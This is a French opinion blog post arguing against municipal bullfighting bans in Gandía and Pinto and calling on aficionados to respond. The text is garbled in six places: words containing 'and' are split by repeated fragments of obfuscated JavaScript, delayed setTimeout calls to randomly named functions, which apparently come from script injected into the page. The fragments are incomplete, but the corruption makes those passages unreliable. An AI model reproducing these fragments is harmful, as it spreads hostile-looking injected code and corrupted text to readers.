NOUS REAGISSONS OU PAS?

Le bombardement a commencé. Cela se voyait venir et les premiers obus sont tombés. Les premières villes touchées ont éte Gandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andía, à Valence, et Pinto, à Madrid. Dans ces deux cités les nouveux responsables muncipaux issus des derniers élections se sont mobilisés pour empêcher des corridas dans leurs villages et les éradiquer par la suite définitivement.

A Gandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andía, gouverné par un de ces tripatouillages tripartites en dehors de toute logique politique -je suis incapable de comprendre comment on peut gouverner avec un parti neolibéral comme l'est le parti socialiste espagnol, un pastiche de nationalisme, modernité et écologie comme l'est la coalition Compromis, et un parti conservateur comme Ciudadanos, la nouvelle mairesse socialiste Diana Morant a communiqué à Carlos Puertas sa décision d'interdire les corridas cette année et de rompre le contrat qu'il avait avec la mairie.

A Pinto, c'est Rafael Sánchez, maire élu sous l'etiquette Ganemos qui s'oppose personnellement aux corridas, sourd aux demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andes de la Plateforme du Compromis Social pour la Tauromachie. L'élu argumente que la suppression des corridas n'est pas une affaire économique mais que c'était une promesse de campagne. Cependant son ròle de censeur, d'autorité qui exerce la censure d'une activité légale sur l'ensemble du territoire espagnol -je pense que la prohibition catalane enfreint la Constitution- en correspond pas du tout avec le code étique vanté par sa formation, quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and ils postulent pour placer avant tout l'homme au centre de l'activité politique -a t'on privé les aficionados de leur condition de citoyens?-, ne discriminer personne – sommes-nous  “personne” les taurins, ou dans le cas contraire, pourquoi sommes-nous discriminés?- et d'arbitrer les mécanismes les plus utiles – référendums, consultations populaires, assemblées- pour que les citoyens paticipent à la prise de la plupart des décisions. Or ici il n'y a eu aucune consultation de faite, on a supprimé les corridas unilatéralement. D'où l'on peut déduire que le maire de Ganemos, si soucieux d'accomplir ses promesses électorales, se fiche du code étique de sa formation quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and on l'applique aux aficionados à la corrida.

Dans cette affaire, il y a quelque chose qui m'interpelle depuis la désicion du maire précédent et nationaliste de Saint-Sébastien d'interdire les corridas. Un maire  at'il le pouvoir légal de faire une telle chose? Qu'arriverait-il si un maire du jour au lendemain décidait par exemple d'interdire les matchs de foot dans sa municipalité? En a t-il le droit?

Je réconnais avoir ma méconnaissance des textes pour répondre à une telle question mais en tout cas je pense qu'empêcher une partie des habitants d'assister à un spectacle absolument légal et réglementé avec l'accord des plus hautes autorités de l'Etat, n'est pas ou en devrait pas être du ressort de n'importe lequel de ces élus.

Si pour le faire, ils profitent d'un vide légal, je ne sais pas ce qu'on attend pour y remédier. C'est là où devrait intervenir, entre autres, les commissions de travail issues de la réunion de la Venta de Antequera en début de saison. Vous vous en souvenez? Et s'il n'existe pas ce vide légal et nous sommes protégés par la Constitution ou par une autre loi de rang mineur, nous devrions avoir un service juridique spécialisé pour présenter devant la justice tous ceux qui entravent le spectacle de la corrida et que la loi s'impose à eux.

La Tauromachie fait partie de notre patrimoine culturel, du patriomoine culturel du peuple, et aucune couleur politique ne devrait l'instrumentaliser. D'ailleurs la Culture, sous aucune de ses formes, en devrait être interdite ni éradiquée comme le prétendent ces élus pour empêcher les citoyens d'assister à un spectacle légal comme l'est la corrida. Cependant c'est une réalité et ça pourrait empirer. Voilà pourquoi je me demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande: allons-nous réagir ou allons-nous continuer à baisser la tête?

Les commentaires sont fermés.